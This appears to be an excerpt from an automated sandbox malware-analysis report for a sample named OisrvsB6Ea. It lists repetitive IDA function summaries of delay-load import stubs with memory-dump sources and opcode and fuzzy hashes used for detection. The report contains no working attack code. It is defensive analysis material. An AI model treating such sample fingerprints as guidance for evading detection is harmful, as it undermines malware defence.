                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 7db1a92680e93d7ead864b3905574935fea465f0b40f2fc5b6539e8782accc46
                                                                                  • Instruction ID: 50c0ff7d7804e9ff60b06798f5c42e1613d24760836ff066c490ccaeee03a458
                                                                                  • Opcode Fuzzy Hash: 7db1a92680e93d7ead864b3905574935fea465f0b40f2fc5b6539e8782accc46
                                                                                  • Instruction Fuzzy Hash: 28B092E937A001AD2504A2055906D3A020DC082B20331403AB809C01C0DC80AE210E32
                                                                                  Function 0028E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 62da32f2115baf27778d20222167b427f753ffa3f5c84d1e82b2c9c21357bb51
                                                                                  • Instruction ID: 28d1961c8e7ffec8d378c47a9c7b363204fd2fafebd31dcb119137040e6c6d71
                                                                                  • Opcode Fuzzy Hash: 62da32f2115baf27778d20222167b427f753ffa3f5c84d1e82b2c9c21357bb51
                                                                                  • Instruction Fuzzy Hash: E9B092DA37A001AD2504A2055906C3A021DC082B10331803AB809C02C09C90AD290E32
                                                                                  Function 0028E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 9418f2c9d3fd31dd5e2d9ea985740f031f0deacda4e9602abb1de28bfdf097f4
                                                                                  • Instruction ID: 495560c0f51160b7efb24445981d26245ae030596eafefd7c736a69c4551b6ee
                                                                                  • Opcode Fuzzy Hash: 9418f2c9d3fd31dd5e2d9ea985740f031f0deacda4e9602abb1de28bfdf097f4
                                                                                  • Instruction Fuzzy Hash: 26B092DA37A141AD2544A2055806C3A021DC082B10371812AB809C02C09880AC640E32
                                                                                  Function 0028E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 5407fa42397d15a0d9c5f5c3497d1e54ca6f54f6aabf7e6184f7fc70d70736d1
                                                                                  • Instruction ID: 11caa63d82222113ec3f2d3dcf524c9944cd9cffc743ff72533898b2d0874773
                                                                                  • Opcode Fuzzy Hash: 5407fa42397d15a0d9c5f5c3497d1e54ca6f54f6aabf7e6184f7fc70d70736d1
                                                                                  • Instruction Fuzzy Hash: CBB092E937A001AD2504A2055806D3A020DC083B20331802AB809C01C09880AD200E32
                                                                                  Function 0028E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 05cf0d64a1123a79a69b4bdbb225ac6156eafdcd9973fa732bf0585ba7dc3e51
                                                                                  • Instruction ID: df7034b35aefa87471ae259224eab6af2cc2892e1caed8a80a18caa2cabc083f
                                                                                  • Opcode Fuzzy Hash: 05cf0d64a1123a79a69b4bdbb225ac6156eafdcd9973fa732bf0585ba7dc3e51
                                                                                  • Instruction Fuzzy Hash: 51B092D937A001AD2504A2155806C3A024DC083B10331802AB809C01C09880AC200E32
                                                                                  Function 0028E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 1c7b15db7990dc4275576ec420c66afd5d861d6650569c3cccdccb02ba15fe4c
                                                                                  • Instruction ID: b9ad27520eb3fef9f80ed14086f4a70e7121fdf78e111b0b5cee23cd6d1c8962
                                                                                  • Opcode Fuzzy Hash: 1c7b15db7990dc4275576ec420c66afd5d861d6650569c3cccdccb02ba15fe4c
                                                                                  • Instruction Fuzzy Hash: B9B092D937A042AD3904A2055806C3A024EC482B10331402AB80AC01C09880AC200E32
                                                                                  Function 0028E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: cc955c051c0b5a285cdf709532f900f764d96a3dc916435137a0b5604206a27a
                                                                                  • Instruction ID: 883fc05cc26da40e1f0de8f1b0d579dbaa6f496591a9bb17a6b6af67ef39da70
                                                                                  • Opcode Fuzzy Hash: cc955c051c0b5a285cdf709532f900f764d96a3dc916435137a0b5604206a27a
                                                                                  • Instruction Fuzzy Hash: 39B092D937A041AD2904A2055806C3A020EC083B10331802AB809C01C09880AC200E32
                                                                                  Function 0028E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: c7cb990d84b1ccabdcd7cf2b574c2ce52c0b0e95ed047477d7ea5de40b976cfa
                                                                                  • Instruction ID: 58c08c76565453316913ec76625115c4e8a09bec665e9a775f26f30830c447b2
                                                                                  • Opcode Fuzzy Hash: c7cb990d84b1ccabdcd7cf2b574c2ce52c0b0e95ed047477d7ea5de40b976cfa
                                                                                  • Instruction Fuzzy Hash: F6B092E937A141AD2944A2455806C3A020EC082B10331412AB809C01C09880AC640E32
                                                                                  Function 0028E2B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 4ed5a3b0b1bacbfb5e83334c8f2a3d16ef9299f50f3ba2bc82a66fe74659c50f
                                                                                  • Instruction ID: d67ffca6e062b5c4a9c239048c6bcec2405828de6b56035a7b117744034e7170
                                                                                  • Opcode Fuzzy Hash: 4ed5a3b0b1bacbfb5e83334c8f2a3d16ef9299f50f3ba2bc82a66fe74659c50f
                                                                                  • Instruction Fuzzy Hash: 41B092D977A002AD3504A2055806C3A020DC082B10331442AB809C01C09880AC200E32
                                                                                  Function 0028E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 41d9d9f6d64003ee2e761c1a01cac2beec8bd06cdfeb280affba88328a40f5de
                                                                                  • Instruction ID: 87e2ad9ffaacff73ea51a6e9aa3641aa43a62141e293c633204ae5e0c601a5a0
                                                                                  • Opcode Fuzzy Hash: 41d9d9f6d64003ee2e761c1a01cac2beec8bd06cdfeb280affba88328a40f5de
                                                                                  • Instruction Fuzzy Hash: B4B092E937A001AD2504A2055906C3A028DC083B10331803AB809C01C09C80AD210E32
                                                                                  Function 0028EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028EAF9
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: 3Ro
                                                                                  • API String ID: 1269201914-1492261280
                                                                                  • Opcode ID: 48f2eb466387c6ed225b81e9b46f9f6699b5c96413d70ef79c7eb008bbad930f
                                                                                  • Instruction ID: e8b191c5b20def3161b61ec5809fc5bc2d0c0f62e28bcd3ceecab9a134bbbacf
                                                                                  • Opcode Fuzzy Hash: 48f2eb466387c6ed225b81e9b46f9f6699b5c96413d70ef79c7eb008bbad930f
                                                                                  • Instruction Fuzzy Hash: 2DB0928A2BF0427D2908B2009902C3A010DC0C2F91331802AB400844D19C800C210932
                                                                                  Function 0028E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: PDu<(
                                                                                  • API String ID: 1269201914-879572730
                                                                                  • Opcode ID: 8d53bed1de12d693512bbe16c13a2f3427139c1fb02e4bfeea7d8476211b1f4f
                                                                                  • Instruction ID: 4c75e2849b645aac642c8dd4550da39b841b55bc9fbc092406dc65e7fecfa635
                                                                                  • Opcode Fuzzy Hash: 8d53bed1de12d693512bbe16c13a2f3427139c1fb02e4bfeea7d8476211b1f4f
                                                                                  • Instruction Fuzzy Hash: E8B0928927A0007D2508B2245806C3A010DC0C2F11371802AB810804C1A8800D240932
                                                                                  Function 0028E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: PDu<(
                                                                                  • API String ID: 1269201914-879572730
                                                                                  • Opcode ID: 652d6042b0792e66ff99acd1c245117ecc56bc893a58dc650d80b1272e0ead32
                                                                                  • Instruction ID: 9cc773100c6f4b4bffd274354cf38e63ec9133cbdcdb0d810602c1ceb68d33fa
                                                                                  • Opcode Fuzzy Hash: 652d6042b0792e66ff99acd1c245117ecc56bc893a58dc650d80b1272e0ead32
                                                                                  • Instruction Fuzzy Hash: BBB092C927A1007D2608B2089802C3A010DC0C2F12371422AB804C01C0A8800C640A32
                                                                                  Function 0028E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E580
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: Fjun(
                                                                                  • API String ID: 1269201914-4259417054
                                                                                  • Opcode ID: 2a0d45d038bb495eed907ecd888b8e95f61a6d5a5d63e9da2c62797a26dbd619
                                                                                  • Instruction ID: a28837b23a53efd4e566fb3de357ff047f9a3d44df34a513f73bc49b827c0c00
                                                                                  • Opcode Fuzzy Hash: 2a0d45d038bb495eed907ecd888b8e95f61a6d5a5d63e9da2c62797a26dbd619
                                                                                  • Instruction Fuzzy Hash: 9DB092CA27A011AD3504A2549D02C3A011DC0C2B10372422AB408C11C0AC804D310E32
                                                                                  Function 0028E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
